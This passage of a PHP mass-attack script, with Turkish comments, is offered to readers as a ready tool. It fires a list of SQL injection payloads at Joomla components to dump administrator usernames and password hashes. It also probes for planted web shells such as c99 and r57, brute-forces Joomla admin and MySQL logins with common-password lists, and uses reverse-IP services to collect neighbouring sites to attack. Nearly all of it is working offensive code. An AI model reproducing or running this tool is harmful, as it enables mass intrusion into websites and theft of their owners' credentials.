$joomlasql[12] = "/index.php?option=com_flippingbook&Itemid=28&book_id=999+UNION+SELECT+null,concat(0x3a,username,0x3a,password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[13] = "/index.php?option=com_actualite&task=edit&id=-1+UNION+SELECT+1,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[14] = "/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[15] = "/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x3a,username,0x3a,password,0x3a),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[16] = "/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,0x3a,password,0x3a),3,4,5,6+from+jos_users--";
$joomlasql[17] = "/components/com_hbssearch/longDesc.php?h_id=1&id=-2%20union%20select%20concat(0x3a,username,0x3a,password,0x3a)%20from%20jos_users--";
$joomlasql[18] = "/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(0x3a,username,0x3a,password,0x3a),4,5+from+jos_users--";
$joomlasql[19] = "/index.php?option=com_news&id=-148+UNION SELECT 1,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--";
$joomlasql[20] = "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--&Itemid=54";
$joomlasql[21] = "/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(0x3a,username,0x3a,password,0x3a),11,12,13,14,15,16 FROM jos_users--";
$joomlasql[22] = "/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(0x3a,username,0x3a,password,0x3a),8,9 from jos_users--%20";
$joomlasql[23] = "/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(0x3a,username,0x3a,password,0x3a),3,4,5 FROM jos_users--";
$joomlasql[24] = "/index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT concat(0x3a,username,0x3a,password,0x3a),2,3 FROM jos_users--";
$joomlasql[25] = "/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat(0x3a,username,0x3a,password,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
$joomlasql[26] = "/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--";
$joomlasql[27] = "/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,0x3a,password,0x3a)+from+jos_users--";
$joomlasql[28] = "/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,0x3a,password,0x3a),3,4,5,6,7,8,9+from+jos_users--";
$joomlasql[29] = "/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12+union+select+0,1,2,group_concat(0x3a,username,0x3a,password,0x3a),4,5,6,7+from+jos_users--";
$joomlasql[30] = "/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=-12+union+select+0,1,2,group_concat(0x3a,username,0x3a,password,0x3a),4,5,6,7+from+jos_users--";
$joomlasql[31] = "/news.php?NewsID=-21166+union+select+1,2,3,concat%28UserName,0x3a,UserPassword,0x3a%29,5,6,7,8,9,10+from+passenger.Users--";
for($i = 0 ; $i < 32 ; $i++)
{
$joomla3 = $metal.$joomlasql[$i];
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$joomla3);
$tarat=curl_exec($curl);
preg_match_all('#:([a-zA-Z0-9]{32}):#si', $tarat , $amks );
foreach($amks[1] as $sikici ) {
echo "=><FONT COLOR=RED>Joomla SQL Bulundu = </fONT> <a href=$joomla3>$joomla3 : $sikici</a><br>";;
ob_flush();
flush();
}
}
}
//Joomla Shell Taraması *+--
function joomla_shell($metal) {
$joomlashell[0] = "/templates/beez/index.php";
$joomlashell[1] = "/templates/rhuk_milkyway/index.php";
$joomlashell[2] = "/templates/ja_purity/index.php";
$joomlashell[3] = "/templates/beez5/index.php";
for($i = 0 ; $i < 4 ; $i++)
{
$joomla2 = $metal.$joomlashell[$i];
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$joomla2);
$tarat=curl_exec($curl);
if(eregi('shell',$tarat)) {
echo "=><FONT COLOR=RED>Joomla Shell Bulundu = </fONT> <a href=$joomla2>$joomla2</a><br>";
ob_flush();
flush();
}
}
}
//Sunucuda Shell Tarar *+--
function server_shell($metal) {
$metalqears[0] = "r57.php";
$metalqears[1] = "c99.php";
$metalqears[2] = "c100.php";
$metalqears[3] = "safe.php";
$metalqears[4] = "bypass.php";
$metalqears[4] = "r00t.php";
$metalqears[4] = "Anjiyo.php";
$metalqears[4] = "sadrazam.php";
$metalqears[4] = "sad.php";
$metalqears[4] = "shell.php";
$metalqears[4] = "a.php";
$metalqears[4] = "c.php";
$metalqears[4] = "webroot.php";
$metalqears[4] = "web.php";
$metalqears[4] = "sym.php";
$metalqears[4] = "mass.php";
for($i = 0 ; $i < 5 ; $i++)
{
$sites = $metal."/".$metalqears[$i];
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$sites);
$tarat=curl_exec($curl);
if(eregi('shell',$tarat)) {
echo "=><FONT COLOR=RED>Shell Bulundu = </fONT> <a href=$sites>$sites</a><br>";
ob_flush();
flush();
}
}
}
// Joomla Brute İçin Hash Al *+--
function joomla_hash($joomla6) {
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$joomla6."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$tarat=curl_exec($curl);
curl_close($curl);
preg_match_all('#<input type="hidden" name="([a-zA-Z0-9]{32})" value="1" />#si', $tarat , $amks );
return $amks[1][0];
}
//Joomla Login *+--
function joomla_login($site) {
$pass = array("123456789",
"12345678",
"1234567",
"123456",
"12345",
"543210",
"6543210",
"7654321",
"654321",
"76543210",
"987654321",
"9876543210",
"0123456",
"012345",
"01234567",
"01234568",
"0123456789",
"abcdef",
"abcdefg",
"abcde",
"abc123",
"abcd123",
"qwerty",
"qwerty123",
"qwerty1",
"qwerty2",
"qwerty12",
"qwerty3",
"111111",
"1111111",
"11111111",
"111111111",
"000000",
"0000000",
"00000000",
"000000000",
"00000",
"99999",
"999999",
"9999999",
"99999999",
"212121",
"21212121",
"31313131",
"313131",
"696696",
"363363",
"admin",
"password",
"sifrem",
"sifre",
"sifre123",
"sifre1",
"sifre12",
"admin123",
"admin1",
"admin12",
"sifrem1",
"sifrem2",
"sifrem12",
"sifrem123",
"789456123",
"321654987",
"7895123",
"9875321",
"sifremi",
"sifresiz");
for($i = 0 ; $i < 67 ; $i++) {
$hash = joomla_hash($site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"username=admin&passwd=$pass[$i]&lang=en-GB&option=com_login&task=login&".$hash.'=1');
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$tarat=curl_exec($curl);
if(eregi('com_categories',$tarat))
{
Echo "====><font color=red> Kırıldı </font> <font color=blue> Kulladı : </font> <font color=red> admin </font><font color=blue>Sifre:</font><font color=red> $pass[$i] </font>";
ob_flush();
flush();
}
elseif(eregi('com_config',$tarat))
{
Echo "====><font color=red> Kırıldı </font> <font color=blue> Kulladı : </font> <font color=red> admin </font><font color=blue>Sifre:</font><font color=red> $pass[$i] </font>";
ob_flush();
flush();
}
}
}
//Mysql Brute
function mysql_brute($metalqear) {
$metalqears = str_replace("http://www.","",$metalqear);
$ip = gethostbyname($metalqears);
$kulla = array(kullanici1($metalqears),kullanici2($metalqears),kullanici3($metalqears));
$sifr = array("123456789",
"12345678",
"1234567",
"123456",
"543210",
"6543210",
"7654321",
"654321",
"76543210",
"987654321",
"9876543210",
"0123456",
"012345",
"0123456789",
"password",
"9875321");
for($i = 0 ; $i < 3 ; $i++) {
for($j = 0 ; $j < 16 ; $j++) {
if (@mysql_connect($ip, $kulla[$i], $sifr[$j])) {
Echo "<font color=red>Mysql Brute Sonucu :</font>====><font color=red> Kırıldı </font> <font color=blue> Kulladı : </font> <font color=red> $kulla[$i]</font><font color=blue>Sifre:</font><font color=red> $sifr[$j] </font>";
}
}
}
}
// -- aaa.com'sa aaa olsun
function kullanici1($kulla) {
$kullas = str_replace("http://www.","",$kulla);
$kullas = str_replace("http://","",$kullas);
$metalqear = explode('.',$kullas,2);
return $metalqear[0];
}
//il sekiz harf
function kullanici2($kulla) {
$kullas = str_replace("http://www.","",$kulla);
$kullas = str_replace("http://","",$kullas);
$kullan = str_replace(".","",$kullas);
$sil = substr($kullan, 0, 8);
return $sil;
}
// ilk8_ilk8
function kullanici3($kulla) {
$kullas = str_replace("http://www.","",$kulla);
$kullas = str_replace("http://","",$kullas);
$kullan = str_replace(".","",$kullas);
$sil = substr($kullan, 0, 8);
return $sil."_".$sil;
}
//Script Tara 2 *+
function script_tara2($metalqear) {
$metal=trim($metalqear);
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$metal);
$metals=curl_exec($curl);
if(eregi('SMF',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> SmF</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
ob_flush();
flush();
echo "<font color=green> Mysql Brute :</font>";
ob_flush();
flush();
mysql_brute($metal);
echo "<font color=blue> Tamamlandı<br>";
ob_flush();
flush();
smf($metals);
}
elseif (eregi('vBulletin',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> Vbulletin</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Mysql Brute :</font>";
ob_flush();
flush();
mysql_brute($metal);
echo "<font color=blue> Tamamlandı<br>";
ob_flush();
flush();
vbulletin($metals);
echo "</font><br>";
ob_flush();
flush();
}
elseif(eregi('phpBB',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> PhpBb</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Mysql Brute :</font>";
ob_flush();
flush();
mysql_brute($metal);
echo "<font color=blue> Tamamlandı<br>";
echo "=><font color=red> Versiyon Taraması :</font><font color=blue> Yapılmadı </font><br>";
ob_flush();
flush();
}
elseif(eregi('WordPress',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> WordPress </font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Mysql Brute :</font>";
ob_flush();
flush();
mysql_brute($metal);
echo "<font color=blue> Tamamlandı<br>";
echo "<font color=green> Plugin Listesi Ve Sürüm </font><br>";
wordpress($metals);
echo "<font color=red> Brute İslemi Başlatılıyor : </font>";
wordpress_brute($metal);
echo " Brute İslemi Tamamlanmıstır</font><br>";
ob_flush();
flush();
}
elseif(eregi('Joomla',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> Joomla </font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Mysql Brute :</font>";
ob_flush();
flush();
mysql_brute($metal);
echo "<font color=blue> Tamamlandı<br>";
echo "<font color=green> Plugin Listesi </font><br>";
ob_flush();
flush();
joomla($metals);
echo "<font color=green> Joomla Lfi Açıkları Taranıyor.. </font><br>";
ob_flush();
flush();
joomla_lfi($metal);
echo "<font color=green> Joomla Templatelerde Shell Taranıyor.. </font><br>";
ob_flush();
flush();
joomla_shell($metal);
echo "<font color=green> Joomla Sql Açıkları Taranıyor.. </font><br>";
ob_flush();
flush();
joomla_sql($metal);
echo "<font color=green> Joomla Brute Baslatılıyor : </font>";
ob_flush();
flush();
joomla_login($metal);
echo " Brute İslemi Tamamlanmıstır<br>";
ob_flush();
flush();
}
else {
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Mysql Brute :</font>";
ob_flush();
flush();
mysql_brute($metal);
echo "<font color=blue> Tamamlandı<br>";
echo '<font color=green> Linkler Alınıyor </font><br>';
ob_flush();
flush();
preg_match_all("/href=\"([^\"]+)/i",$metals,$metal9);
foreach (array_unique($metal9[1]) as $amk) {
if(eregi('google.com',$amk)) {
}
elseif(eregi('facebook.com',$amk)) {
}
elseif(eregi('youtube.com',$amk)) {
}
elseif(eregi('microsoft.com',$amk)) {
}
elseif(eregi('addthis.com',$amk)) {
}
elseif(eregi('adobe.com',$amk)) {
}
elseif(eregi('w3.org',$amk)) {
}
elseif(eregi('twitter.com',$amk)) {
}
elseif(eregi('.html?',$amk)) {
}
elseif(eregi('.css',$amk)) {
}
elseif(eregi('index.php?option=',$amk)) {
}
elseif(eregi('MyBB',$amk)) {
}
elseif(eregi('@',$amk)) {
}
else {
if(eregi('http',$amk)) {
if(strstr($amk,"=")) {
$icerik = file_get_contents('link.txt');
$aaa = delLast($amk);
if(!eregi($aaa,$icerik)) {
$klas = fopen('link.txt','a');
$yaz = fwrite($klas,$amk."\r\n");
echo "=> <a href=$amk>$amk</a><br>";
ob_flush();
flush();
tara($amk);
}
}
}
else {
if(strstr($amk,"=")) {
$amks = $metal."/".$amk;
$aaa = delLast($amks);
$icerik = file_get_contents('link.txt');
if(!eregi($aaa,$icerik)) {
echo "=> <a href=$amks>$amks</a><br>";
ob_flush();
flush();
$klas = fopen('link.txt','a');
$yaz = fwrite($klas,$amks."\r\n");
tara($amks);
}
}
}
}
}
}
}
function coklu_reverse($metalqear) {
$metal2 = "http://viewdns.info/reverseip/?host=";
$metalqear2 = $metal2.$metalqear.'&t=1';
$metal = file_get_contents($metalqear2);
preg_match_all('#<tr><td>(.*?)</td>#si', $metal , $amks );
foreach(array_unique($amks[1]) as $reverse) {
if(strstr($reverse,'.')) {
$site = 'http://www.'.$reverse;
$klass = fopen('reverse.txt','a');
if(eregi('IP results',$site)) {
}
elseif(eregi('IP address',$site)) {
}
elseif(eregi('viewdns.info',$site)) {
}
else {
if(!eregi($site,$klass)) {
$yaz = fwrite($klass,$site."\r\n");
ob_flush();
flush();
}
}
}
}
$metal3 = "http://www.websiteneighbors.com/results.php?output=php&ip_host=";
$metalqear3 = $metal3.$metalqear;
$metal2 = file_get_contents($metalqear3);
preg_match_all('#<a href="(.*?)" target="_blank">#si', $metal2 , $amks2 );
foreach(array_unique($amks2[1]) as $reverses) {
$klass1 = fopen('reverse.txt','a');
if(!strstr($reverses,'Neighborhoods')) {
$sesi = file_get_contents("reverse.txt");
if(eregi('http://www.',$reverses)) {
$icerik = file_get_contents('reverse.txt');
if(!eregi($reverses,$icerik)) {
$yaz = fwrite($klass1,$reverses."\r\n");
}
}
else {
$metalqears1 = str_replace("http://","",$reverses);
$icerik = file_get_contents('reverse.txt');
if(!eregi($metalqears1,$icerik)) {
$yaz = fwrite($klass1,"http://www.".$metalqears1."\r\n");
}
}
}
}
$metal4 = "http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php?remoteAddress=";
$metalqear4 = $metal4.$metalqear;
$metal4 = file_get_contents($metalqear4);
preg_match_all('/"(.*?)"/si', $metal4, $sitemis);
foreach(array_unique($sitemis[1]) as $reverse1) {
$klass2 = fopen('reverse.txt','a');
if(strstr($reverse1,'.')) {
if(eregi('www',$reverse1)) {
$icerik4 = file_get_contents('reverse.txt');
$site = 'http://'.$reverse1;
if(!eregi($reverse1,$icerik4)) {
$yaz = fwrite($klass2,$site."\r\n");
}
}
else {
$icerik4 = file_get_contents('reverse.txt');
$site = 'http://www.'.$reverse1;
if(!eregi($reverse1,$icerik4)) {
$yaz = fwrite($klass2,$site."\r\n");
}
}
}
}
}
?>Buyrun Beyler ....
